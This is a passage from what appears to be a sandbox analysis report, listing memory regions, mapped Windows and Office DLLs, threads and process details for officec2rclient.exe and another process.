entry_point = 0x7ffb39b60000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2089
start_va = 0x7ffb39d60000
end_va = 0x7ffb39d6efff
entry_point = 0x7ffb39d60000
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2090
start_va = 0x7ffb39d70000
end_va = 0x7ffb39d82fff
entry_point = 0x7ffb39d70000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2091
start_va = 0x7ffb39d90000
end_va = 0x7ffb39dd9fff
entry_point = 0x7ffb39d90000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 2092
start_va = 0x7ffb39de0000
end_va = 0x7ffb3a407fff
entry_point = 0x7ffb39de0000
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 2093
start_va = 0x7ffb3a570000
end_va = 0x7ffb3a622fff
entry_point = 0x7ffb3a570000
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 2094
start_va = 0x7ffb3a9f0000
end_va = 0x7ffb3aa40fff
entry_point = 0x7ffb3a9f0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2095
start_va = 0x7ffb3aa50000
end_va = 0x7ffb3bf74fff
entry_point = 0x7ffb3aa50000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2096
start_va = 0x7ffb34cc0000
end_va = 0x7ffb34f33fff
entry_point = 0x7ffb34cc0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll")
Region:
id = 2097
start_va = 0xe7b35f0000
end_va = 0xe7b35f0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000e7b35f0000"
filename = ""
Region:
id = 2098
start_va = 0xe7b3600000
end_va = 0xe7b3601fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000e7b3600000"
filename = ""
Region:
id = 2099
start_va = 0xe7b3680000
end_va = 0xe7b3838fff
entry_point = 0xe7b3680000
region_type = mapped_file
name = "office.odf"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf")
Region:
id = 2100
start_va = 0x7ffb355d0000
end_va = 0x7ffb35b14fff
entry_point = 0x7ffb355d0000
region_type = mapped_file
name = "d2d1.dll"
filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll")
Region:
id = 2101
start_va = 0x7ffb352c0000
end_va = 0x7ffb352f5fff
entry_point = 0x7ffb352c0000
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 2102
start_va = 0x7ffb37a60000
end_va = 0x7ffb37a72fff
entry_point = 0x7ffb37a60000
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 2103
start_va = 0x7ffb37bf0000
end_va = 0x7ffb37c8bfff
entry_point = 0x7ffb37bf0000
region_type = mapped_file
name = "dxgi.dll"
filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll")
Region:
id = 2104
start_va = 0x7ffb391c0000
end_va = 0x7ffb39217fff
entry_point = 0x7ffb391c0000
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 2105
start_va = 0x7ffb38970000
end_va = 0x7ffb38997fff
entry_point = 0x7ffb38970000
region_type = mapped_file
name = "rmclient.dll"
filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll")
Region:
id = 2106
start_va = 0xe7b3840000
end_va = 0xe7b3b47fff
entry_point = 0xe7b3840000
region_type = mapped_file
name = "mso40uires.dll"
filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll")
Region:
id = 2107
start_va = 0xe7b3b50000
end_va = 0xe7b3c4ffff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b3b50000"
filename = ""
Region:
id = 2108
start_va = 0xe7b3cd0000
end_va = 0xe7b3cdffff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b3cd0000"
filename = ""
Region:
id = 2109
start_va = 0xe7b3ce0000
end_va = 0xe7b3ddffff
entry_point = 0x0
region_type = private
name = "private_0x000000e7b3ce0000"
filename = ""
Region:
id = 2110
start_va = 0x7ff6e5714000
end_va = 0x7ff6e5715fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6e5714000"
filename = ""
Region:
id = 2111
start_va = 0x7ff6e5716000
end_va = 0x7ff6e5717fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6e5716000"
filename = ""
Region:
id = 2112
start_va = 0x7ffb334d0000
end_va = 0x7ffb334dbfff
entry_point = 0x7ffb334d0000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 2113
start_va = 0x7ffb3c290000
end_va = 0x7ffb3c2c5fff
entry_point = 0x7ffb3c290000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2114
start_va = 0x7ffb3d020000
end_va = 0x7ffb3d17bfff
entry_point = 0x7ffb3d020000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Thread:
id = 225
os_tid = 0x1f4
Thread:
id = 226
os_tid = 0xda4
Thread:
id = 227
os_tid = 0xd74
Thread:
id = 228
os_tid = 0x370
Thread:
id = 229
os_tid = 0xd84
Process:
id = "16"
image_name = "officec2rclient.exe"
filename = "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe"
page_root = "0x3b60b000"
os_pid = "0xe9c"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "child_process"
parent_id = "14"
os_parent_pid = "0xae8"
cmd_line = "\"C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeC2RClient.exe\" /WatchService"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xe], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b1b3" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 2115
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2116
start_va = 0x2bb3de0000
end_va = 0x2bb3dfffff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb3de0000"
filename = ""
Region:
id = 2117
start_va = 0x2bb3e00000
end_va = 0x2bb3e13fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000002bb3e00000"
filename = ""
Region:
id = 2118
start_va = 0x2bb3e20000
end_va = 0x2bb3f1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb3e20000"
filename = ""
Region:
id = 2119
start_va = 0x2bb3f20000
end_va = 0x2bb3f23fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000002bb3f20000"
filename = ""
Region:
id = 2120
start_va = 0x2bb3f30000
end_va = 0x2bb3f30fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000002bb3f30000"
filename = ""
Region:
id = 2121
start_va = 0x2bb3f40000
end_va = 0x2bb3f41fff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb3f40000"
filename = ""
Region:
id = 2122
start_va = 0x7ff6e5880000
end_va = 0x7ff6e58a2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6e5880000"
filename = ""
Region:
id = 2123
start_va = 0x7ff6e58aa000
end_va = 0x7ff6e58aafff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6e58aa000"
filename = ""
Region:
id = 2124
start_va = 0x7ff6e58ae000
end_va = 0x7ff6e58affff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6e58ae000"
filename = ""
Region:
id = 2125
start_va = 0x7ff6e5db0000
end_va = 0x7ff6e6363fff
entry_point = 0x7ff6e5db0000
region_type = mapped_file
name = "officec2rclient.exe"
filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RClient.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rclient.exe")
Region:
id = 2126
start_va = 0x7ffb3d310000
end_va = 0x7ffb3d4d1fff
entry_point = 0x7ffb3d310000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2127
start_va = 0x2bb3de0000
end_va = 0x2bb3deffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000002bb3de0000"
filename = ""
Region:
id = 2128
start_va = 0x2bb3f50000
end_va = 0x2bb400dfff
entry_point = 0x2bb3f50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2129
start_va = 0x2bb4020000
end_va = 0x2bb411ffff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb4020000"
filename = ""
Region:
id = 2130
start_va = 0x7ff6e5780000
end_va = 0x7ff6e587ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007ff6e5780000"
filename = ""
Region:
id = 2131
start_va = 0x7ffb3a800000
end_va = 0x7ffb3a9dcfff
entry_point = 0x7ffb3a800000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2132
start_va = 0x7ffb3d260000
end_va = 0x7ffb3d30cfff
entry_point = 0x7ffb3d260000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2133
start_va = 0x2bb3df0000
end_va = 0x2bb3df6fff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb3df0000"
filename = ""
Region:
id = 2134
start_va = 0x2bb4010000
end_va = 0x2bb4016fff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb4010000"
filename = ""
Region:
id = 2135
start_va = 0x2bb4120000
end_va = 0x2bb421ffff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb4120000"
filename = ""
Region:
id = 2136
start_va = 0x2bb4220000
end_va = 0x2bb4220fff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb4220000"
filename = ""
Region:
id = 2137
start_va = 0x2bb4230000
end_va = 0x2bb4230fff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb4230000"
filename = ""
Region:
id = 2138
start_va = 0x2bb4240000
end_va = 0x2bb4240fff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb4240000"
filename = ""
Region:
id = 2139
start_va = 0x2bb4250000
end_va = 0x2bb425ffff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb4250000"
filename = ""
Region:
id = 2140
start_va = 0x2bb4260000
end_va = 0x2bb43e7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000002bb4260000"
filename = ""
Region:
id = 2141
start_va = 0x2bb43f0000
end_va = 0x2bb4570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000002bb43f0000"
filename = ""
Region:
id = 2142
start_va = 0x2bb4580000
end_va = 0x2bb463ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000002bb4580000"
filename = ""
Region:
id = 2143
start_va = 0x2bb4640000
end_va = 0x2bb4640fff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb4640000"
filename = ""
Region:
id = 2144
start_va = 0x2bb4650000
end_va = 0x2bb4652fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000002bb4650000"
filename = ""
Region:
id = 2145
start_va = 0x2bb4660000
end_va = 0x2bb466ffff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb4660000"
filename = ""
Region:
id = 2146
start_va = 0x2bb4670000
end_va = 0x2bb4672fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000002bb4670000"
filename = ""
Region:
id = 2147
start_va = 0x2bb4680000
end_va = 0x2bb4682fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000002bb4680000"
filename = ""
Region:
id = 2148
start_va = 0x2bb4690000
end_va = 0x2bb469ffff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb4690000"
filename = ""
Region:
id = 2149
start_va = 0x2bb46a0000
end_va = 0x2bb479ffff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb46a0000"
filename = ""
Region:
id = 2150
start_va = 0x2bb47a0000
end_va = 0x2bb47a1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000002bb47a0000"
filename = ""
Region:
id = 2151
start_va = 0x2bb47b0000
end_va = 0x2bb47b0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000002bb47b0000"
filename = ""
Region:
id = 2152
start_va = 0x2bb47d0000
end_va = 0x2bb47d1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000002bb47d0000"
filename = ""
Region:
id = 2153
start_va = 0x2bb4810000
end_va = 0x2bb481ffff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb4810000"
filename = ""
Region:
id = 2154
start_va = 0x2bb4820000
end_va = 0x2bb4b56fff
entry_point = 0x2bb4820000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2155
start_va = 0x2bb4b60000
end_va = 0x2bb4c5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000002bb4b60000"
filename = ""
Region:
id = 2156
start_va = 0x2bb4c60000
end_va = 0x2bb4e18fff
entry_point = 0x2bb4c60000
region_type = mapped_file
name = "office.odf"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf")
Region:
id = 2157
start_va = 0x7ff6e58a6000
end_va = 0x7ff6e58a7fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6e58a6000"
filename = ""
Region:
id = 2158
start_va = 0x7ff6e58a8000
end_va = 0x7ff6e58a9fff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6e58a8000"
filename = ""
Region:
id = 2159
start_va = 0x7ff6e58ac000
end_va = 0x7ff6e58adfff
entry_point = 0x0
region_type = private
name = "private_0x00007ff6e58ac000"
filename = ""
Region:
id = 2160
start_va = 0x7ffb251d0000
end_va = 0x7ffb2526dfff
entry_point = 0x7ffb251d0000
region_type = mapped_file
name = "wer.dll"
filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")
Region:
id = 2161
start_va = 0x7ffb25580000
end_va = 0x7ffb25629fff
entry_point = 0x7ffb25580000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_0212ec7eba871e86\\comctl32.dll")
Region:
id = 2162
start_va = 0x7ffb334d0000
end_va = 0x7ffb334dbfff
entry_point = 0x7ffb334d0000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 2163
start_va = 0x7ffb33750000
end_va = 0x7ffb33a8cfff
entry_point = 0x7ffb33750000
region_type = mapped_file
name = "msi.dll"
filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll")
Region:
id = 2164
start_va = 0x7ffb33a90000
end_va = 0x7ffb33c38fff
entry_point = 0x7ffb33a90000
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10240.16384_none_89a94c179af51f83\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10240.16384_none_89a94c179af51f83\\gdiplus.dll")
Region:
id = 2165
start_va = 0x7ffb33c40000
end_va = 0x7ffb3452afff
entry_point = 0x7ffb33c40000
region_type = mapped_file
name = "mso40uiwin32client.dll"
filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll")
Region:
id = 2166
start_va = 0x7ffb34530000
end_va = 0x7ffb349a7fff
entry_point = 0x7ffb34530000
region_type = mapped_file
name = "mso30win32client.dll"
filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso30win32client.dll")
Region:
id = 2167
start_va = 0x7ffb349b0000
end_va = 0x7ffb34cb3fff
entry_point = 0x7ffb349b0000
region_type = mapped_file
name = "mso20win32client.dll"
filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso20win32client.dll")
Region:
id = 2168
start_va = 0x7ffb34cc0000
end_va = 0x7ffb34f33fff
entry_point = 0x7ffb34cc0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll")
Region:
id = 2169
start_va = 0x7ffb34f70000
end_va = 0x7ffb34f99fff
entry_point = 0x7ffb34f70000
region_type = mapped_file
name = "apiclient.dll"
filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ApiClient.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\apiclient.dll")
Region:
id = 2170
start_va = 0x7ffb34fe0000
end_va = 0x7ffb3507dfff
entry_point = 0x7ffb34fe0000
region_type = mapped_file
name = "msvcp140.dll"
filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msvcp140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msvcp140.dll")
Region:
id = 2171
start_va = 0x7ffb35080000
end_va = 0x7ffb35096fff
entry_point = 0x7ffb35080000
region_type = mapped_file
name = "vcruntime140.dll"
filename = "\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\vcruntime140.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\vcruntime140.dll")
Region:
id = 2172
start_va = 0x7ffb352c0000
end_va = 0x7ffb352f5fff
entry_point = 0x7ffb352c0000
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 2173
start_va = 0x7ffb355d0000
end_va = 0x7ffb35b14fff
entry_point = 0x7ffb355d0000
region_type = mapped_file
name = "d2d1.dll"
filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll")
Region:
id = 2174
start_va = 0x7ffb35bc0000
end_va = 0x7ffb35cb1fff
entry_point = 0x7ffb35bc0000
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll")
Region:
id = 2175
start_va = 0x7ffb39780000
end_va = 0x7ffb3978afff
entry_point = 0x7ffb39780000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2176
start_va = 0x7ffb39960000
end_va = 0x7ffb3998bfff
entry_point = 0x7ffb39960000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2177
start_va = 0x7ffb39b60000
end_va = 0x7ffb39b87fff
entry_point = 0x7ffb39b60000
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 2178
start_va = 0x7ffb39b90000
end_va = 0x7ffb39bfafff
entry_point = 0x7ffb39b90000
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2179
start_va = 0x7ffb39d60000
end_va = 0x7ffb39d6efff
entry_point = 0x7ffb39d60000
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Region:
id = 2180
start_va = 0x7ffb39d70000
end_va = 0x7ffb39d82fff
entry_point = 0x7ffb39d70000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2181
start_va = 0x7ffb39d90000
end_va = 0x7ffb39dd9fff
entry_point = 0x7ffb39d90000
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 2182
start_va = 0x7ffb39de0000
end_va = 0x7ffb3a407fff
entry_point = 0x7ffb39de0000
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 2183
start_va = 0x7ffb3a570000
end_va = 0x7ffb3a622fff
entry_point = 0x7ffb3a570000
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 2184
start_va = 0x7ffb3a9f0000
end_va = 0x7ffb3aa40fff
entry_point = 0x7ffb3a9f0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2185
start_va = 0x7ffb3aa50000
end_va = 0x7ffb3bf74fff
entry_point = 0x7ffb3aa50000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2186
start_va = 0x7ffb3bf80000
end_va = 0x7ffb3c0a5fff
entry_point = 0x7ffb3bf80000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2187
start_va = 0x7ffb3c2d0000
end_va = 0x7ffb3c375fff
entry_point = 0x7ffb3c2d0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2188
start_va = 0x7ffb3c3e0000
end_va = 0x7ffb3c564fff
entry_point = 0x7ffb3c3e0000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2189
start_va = 0x7ffb3c650000
end_va = 0x7ffb3c79dfff
entry_point = 0x7ffb3c650000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2190
start_va = 0x7ffb3c950000
end_va = 0x7ffb3c9aafff
entry_point = 0x7ffb3c950000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2191
start_va = 0x7ffb3c9b0000
end_va = 0x7ffb3ca6dfff
entry_point = 0x7ffb3c9b0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2192
start_va = 0x7ffb3cb20000
end_va = 0x7ffb3cc60fff
entry_point = 0x7ffb3cb20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2193
start_va = 0x7ffb3cc70000
end_va = 0x7ffb3ceebfff
entry_point = 0x7ffb3cc70000
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 2194
start_va = 0x7ffb3cf10000
end_va = 0x7ffb3cfacfff
entry_point = 0x7ffb3cf10000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Thread:
id = 235
os_tid = 0xd34
Thread:
id = 236
os_tid = 0xde4
Thread:
id = 237
os_tid = 0xe38
Thread:
id = 238
os_tid = 0xe5c